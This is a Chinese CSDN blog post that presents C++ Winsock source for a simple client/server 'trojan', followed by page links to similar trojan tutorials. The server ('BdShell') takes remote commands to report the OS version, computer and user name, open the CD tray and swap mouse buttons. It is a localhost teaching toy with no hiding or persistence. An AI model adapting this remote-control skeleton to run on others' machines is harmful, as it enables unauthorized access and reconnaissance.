实现一个c/s模式的简单木马

最新推荐文章于 2019-05-26 21:44:36 发布
最新推荐文章于 2019-05-26 21:44:36 发布
阅读量766 收藏 6
点赞数 1
分类专栏: hack
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012319493/article/details/50397263
版权

服务器:

#include "iostream"
#include "winsock2.h"
#include "string.h"
#pragma comment (lib, "ws2_32")
#pragma comment(lib, "Winmm.lib ") 
using namespace std;

#define HELPMSG "help - Show help menu \n"\
                 "getsysinfo - Get system information \n"\
                 "open - Open the CDRom \n"\
                 "close - Close the CDRom \n"\
                 "swap - Swap mouse button \n"\
                 "restore - Restore mouse button \n"\
                 "exit - Quit Bdshell\n"

//保存获得的系统信息
typedef struct _SYS_INFO
{
    OSVERSIONINFO OsVer;  //保存操作系统信息
    char szComputerName[MAXBYTE];  //保存计算机名
    char szUserName[MAXBYTE];  //保存当前登录名
}_SYS_INFO, *PSYS_INFO;

//获取系统的相关信息
void GetSysInfo(_SYS_INFO &sys)
{
    unsigned long nSize = MAXBYTE;
    sys.OsVer.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);  //结构体大小
    GetVersionEx(&sys.OsVer);  //获得操作系统版本

    GetComputerName(sys.szComputerName, &nSize);  //获取计算机名称

    nSize = MAXBYTE;
    GetUserName(sys.szUserName, &nSize);  //获取当前用户名称
}


//对命令进行判断和比较
bool Dispatch(SOCKET sock, char *szCmd)
{
    bool bRet = false;

    //根据不同的命令,完成不同的功能
    if(!strcmp(szCmd, "help"))
    {
        send(sock, HELPMSG, strlen(HELPMSG)+sizeof(char), 0);
        bRet = true;
    }
    //获取系统信息
    else if(!strcmp(szCmd, "getsysinfo"))
    {
        _SYS_INFO sysInfo;
        GetSysInfo(sysInfo);
        send(sock, (const char *)&sysInfo, sizeof(_SYS_INFO), 0);
        bRet = true;
    }
    //打开光驱
    else if(!strcmp(szCmd, "open"))
    {
        mciSendString("set cdaudio door open", NULL, NULL, NULL);
        bRet = true;
    }
    //关闭光驱
    else if(!strcmp(szCmd, "close"))
    {
        mciSendString("set cdaudio door closed", NULL, NULL, NULL);
        bRet = true;
    }
    //交换鼠标左右键功能
    else if(!strcmp(szCmd, "swap"))
    {
        SwapMouseButton(true);
        bRet = true;
    }
    //恢复鼠标左右键功能
    else if(!strcmp(szCmd, "restore"))
    {
        SwapMouseButton(false);
        bRet = true;
    }
    else
    {
        bRet = false;
    }
    return bRet;
}

int main()
{
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 2), &wsaData);  //初始化ws2_32.dll动态库连接

    SOCKET s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

    sockaddr_in sockaddr;
    sockaddr.sin_family = PF_INET;
    sockaddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1"); //IP地址,将IP转换为unsigned long型数值
    sockaddr.sin_port = htons(827); //端口号,本地字节顺序转换为网络字节顺序

    bind(s, (SOCKADDR*)&sockaddr, sizeof(SOCKADDR));

    listen(s, 1);


    SOCKADDR clientAddr;
    int nSize = sizeof(SOCKADDR);
    SOCKET clientSock;
    //从处于监听状态的流套接字的客户端请求队列中取出第一个请求,并创建一个新的套接字与客户端进行通信
    clientSock = accept(s, (SOCKADDR *)&clientAddr, &nSize); 

    while(true)
    {
        //发送一个命令提示
        send(clientSock, "\nBdShell>>", strlen("\nBdShell>>")+sizeof(char), 0);

        char buff[MAXBYTE] = {0};

        //接收客户端发来的命令
        recv(clientSock, buff, MAXBYTE, 0);
        if(!strcmp(buff, "exit"))
            break;

        //分发命令
        bool bRet = Dispatch(clientSock, buff);
        if(bRet == false)
            send(clientSock, "Command Unsuccessfuly!", strlen("Command Unsuccessfuly!")+sizeof(char), 0);
    }

    closesocket(clientSock);
    closesocket(s);

    WSACleanup();  //释放ws2_32.dll
    return 0;
}

客户端:

#include "winsock2.h"
#include "iostream"
#include "conio.h"

#pragma comment (lib, "ws2_32")

typedef struct _SYS_INFO
{
    OSVERSIONINFO OsVer;  //保存操作系统信息
    char szComputerName[MAXBYTE];  //保存计算机名
    char szUserName[MAXBYTE];  //保存当前登录名
}_SYS_INFO, *PSYS_INFO;

void showInfo(PSYS_INFO &sys)
{
    if(sys->OsVer.dwPlatformId == VER_PLATFORM_WIN32_NT) //平台ID
    {
        if(sys->OsVer.dwMajorVersion == 6 && sys->OsVer.dwMinorVersion == 1)
            printf("Win7 %s\n", sys->OsVer.szCSDVersion);  //补丁包
        else if(sys->OsVer.dwMajorVersion==5 && sys->OsVer.dwMinorVersion==2)
            printf("Windows 2003 \n");
        else if(sys->OsVer.dwMajorVersion == 5 && sys->OsVer.dwMinorVersion == 1) //主版本号,次版本号
            printf("Windows XP %s \r\n", sys->OsVer.szCSDVersion);  
        else if(sys->OsVer.dwMajorVersion == 5 && sys->OsVer.dwMinorVersion == 0)
            printf("Windows 2000 \r\n");
        else
            printf("Windows other\n");
    }
    else
        printf("Other System \r\n");

    printf("Computer name is %s \r\n", sys->szComputerName);

    printf("User name is %s\n", sys->szUserName);
}

int main()
{
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 2), &wsaData);

    SOCKET ClientSock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

    sockaddr_in ServerAddr;
    ServerAddr.sin_family = PF_INET;
    ServerAddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
    ServerAddr.sin_port = htons(827);

    connect(ClientSock, (SOCKADDR*)&ServerAddr, sizeof(SOCKADDR));

    while(true)
    {
        char buff[MAXBYTE] = {0};
        char Cmd[MAXBYTE] = {0};

        recv(ClientSock, buff, MAXBYTE, 0);
        printf("%s", buff);

        scanf("%s", Cmd);
        send(ClientSock, Cmd, MAXBYTE, 0);
        if(!strcmp(Cmd, "exit"))
        {
            printf("Login out!\n");
            break;
        }

        memset(buff, 0, MAXBYTE);
        recv(ClientSock, buff, MAXBYTE, 0);

        if(!strcmp(Cmd, "getsysinfo"))
        {
            PSYS_INFO SysInfo = (PSYS_INFO)buff;
            showInfo(SysInfo);
        }
        else
            printf("%s", buff);
    }

    getch();
    WSACleanup();
    return 0;
}

服务器:

客户端:
这里写图片描述

谛听-
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
毕业设计 C/S结构远程控制木马代码(附答辩ppt) C#.net
04-05
在受控端计算机上实现重启计算机后能够自启动功能,并能对其进行屏幕控制、查看目录、上传下载文件、屏幕消息、停止控制功能,进行远程控制测试并能通过测试。 此毕设是08年根据jackch88共享的源码进行学习并修改。由于能力有限,修改的不是很好有点乱有点粗糙,但通过毕业设计是没问题的。 再次感谢jackch88的共享!
木马的C/S架构
neibubo1的专栏
11-21 2755
远程计算机监控和管理,让网络管理员可以不必亲临计算机,就可以像坐在计算机前 面一样进行管理,大大地提高了管理工作的效率和方便性。只是这些功能必须利用操作系 统内建的监控工具或安装其他网络管理工具才能实现木马程序是一类特殊的计算机程序,其作用是在一台计算机上监控被植入木马计算机 的情况。与网络管理工具的最大区别在于,木马程序总是偷偷摸摸地进入其他人的计算 机,而网络管理工具则是光明正大地安
一个简单木马程序的实现
热门推荐
天绝弑杀
06-09 1万+
一个简单木马实现,麻雀虽小,五脏俱全,用到了socket和窗口隐藏技术
WINDOWS系统下木马程序的设计与实现
DelPhi7292117的专栏
02-10 1037
WINDOWS系统下木马程序的设计与实现2010-1-10     作者:尘封 QQ:763934197    近年来,黑客攻击层出不穷,对网络安全构成了极大的威胁。木马是黑客的主要攻击手段之一,它通过渗透进入对方主机系统,从而实现对目标主机的远程操作,破坏力相当之大。    到目前为止,木马的发展已经历了五代:    第一代木马只是实现简单的密码窃取、发送等,在隐藏和通信方面
从蓝屏最小的asp木马来看C/S木马技术
生命的守望
01-15 1565
信息来源:补天网这几天狂补asp,昨天休息,无聊就把自己的东西总结了一下,突然想到了我们经常使用的C/S型的webshell,于是乎就胡乱分析了一下!呵呵!众所周知,蓝屏的最小的asp木马,服务端仅一句话:可以说是C/S型木马的极品!再看客户端:set lP=server.createObject("Adodb.Stream")lP.OpenlP.Type=2lP.CharSet="gb2312"
远程屏幕截图的实现(支持TCP与SPXII协议)
11-12
TCP模式下是exe实现的B/S架构形式,IPX模式下是C/S架构。 仅供参考,请勿用作木马程序。由于水平有限, 做工相对简陋,还有很多莫名其妙的bug (如类型转化语句不能执行,FreeMem报错 而FreeMemory正常等,详见注释...
Delphi下TCP/IPX双协议编程实例:远程屏幕截图
11-13
Delphi7.0代码(自行改写wsipx.h)。可以在局域网内的一台机器上随时抓取另一台机器的屏幕截图。两种协议模式以编译指令区分...TCP模式下是exe实现的B/S架构形式,IPX模式下是C/S架构。 仅供参考,请勿用作木马程序。
网络安全技术—浅析网络攻击与防范(全文).docx
06-09
执行木马的客户端和服务器端在运行模式上属于客户机/服务器方式Client/Server,C/S 客户端在当地计算机上运行,用来操纵服务器端。而服务器端则是在远程计算机上运行,只要运行成功该计算机就中了木马,那么就变成了...
网络安全技术习题库..doc
06-09
删除一个绑定 C. 绑定一个MAC地址和IP地址 D. 进行ARP攻击 8. 系统内置netstat命令中参数-a的作用是 ( )。 A. 表示按协议显示各种连接的统计信息,包括端口号 B. 表示显示活动的TCP连接并包括每个连接的进程ID C. ...
计算机应用技术(实用手册)
07-29
让默认的就可以了,但是超频玩者是肯定不会放过任何可以提高性能的东西的,所以如果你想在这里让你的电脑提升一点性能的话,就必须慢慢试验,选择一个适当的参数才能让你的计算机达到性能和稳定的最佳状态!...
C/S模式的例子
12-16
一个C/S模式的例子
JAVA实现的C/S模式的聊天室程序代码
03-28
用Java代码实现简单的聊天室功能,多个用户可以同时一起聊天,代码简单易懂。毕业设计作品。
C语言木马编写
03-21
基于C语言socket编写的木马实现了执行CMD、上传下载文件以及管理木马表等功能。
C/S的一个简单实现
06-23
一个简单的Java源代码,主要就是为了实现Client和Server的访问
java基于C/S模式实现聊天程序(服务器)
08-26
主要为大家详细介绍了java基于C/S模式实现聊天程序的服务器篇,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
利用流式套接字传输数据文件
新博客:https://aping-dev.com/
12-18 4774
服务器端: 1>建立一个基于对话框的应用程序StreamSocketServer 2>设计界面,将“确定”按钮的标题改为“启动” 3>双击“启动按钮”,添加以下代码,初始化网络,启动服务器监听void CStreamSocketServerDlg::OnOK() { // TODO: Add extra validation here WSADATA wsaData;
vbox kali安装linux-headers
新博客:https://aping-dev.com/
12-24 3389
打开sources.listvim /etc/apt/sources.list添加官方源deb http://http.kali.org/kali kali-rolling main non-free contrib deb-src http://http.kali.org/kali kali-rolling main non-free contrib 更新apt-get update apt-ge
创建TCP代理
新博客:https://aping-dev.com/
01-16 2263
TCP代理可以将流量从一个主机转发给另一个主机,还可以起到类似Wireshark的作用,了解未知的协议,修改发送到应用的数据包。 main 读入命令行,解析,调用server_loop监听连接请求,当一个新的请求到达时,交给proxy_handler处理。 proxy_handler: 每接收1 bit数据,发送到目标远程主机。持续从本地读取数据、处理、发送到远程主机,从远程读取数据、处理、
栈溢出覆盖返回地址
新博客:https://aping-dev.com/
05-26 2212
#include<stdio.h> #include<stdlib.h> int stack_over_flow() { char Password[16] = { 0, }; gets(Password); return 0; } void readfile() { FILE* fp; char FileStr[20] = { 0, }; pri...
检测一个小程序是否内含有木马
最新发布
06-11
要检测一个小程序是否内含有木马,可以尝试以下几种方法: 1. 使用杀毒软件进行扫描。这是最常见的方法,利用杀毒软件的病毒库,对小程序进行全盘扫描,查找是否有恶意代码。常见的杀毒软件有360安全卫士、腾讯电脑...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值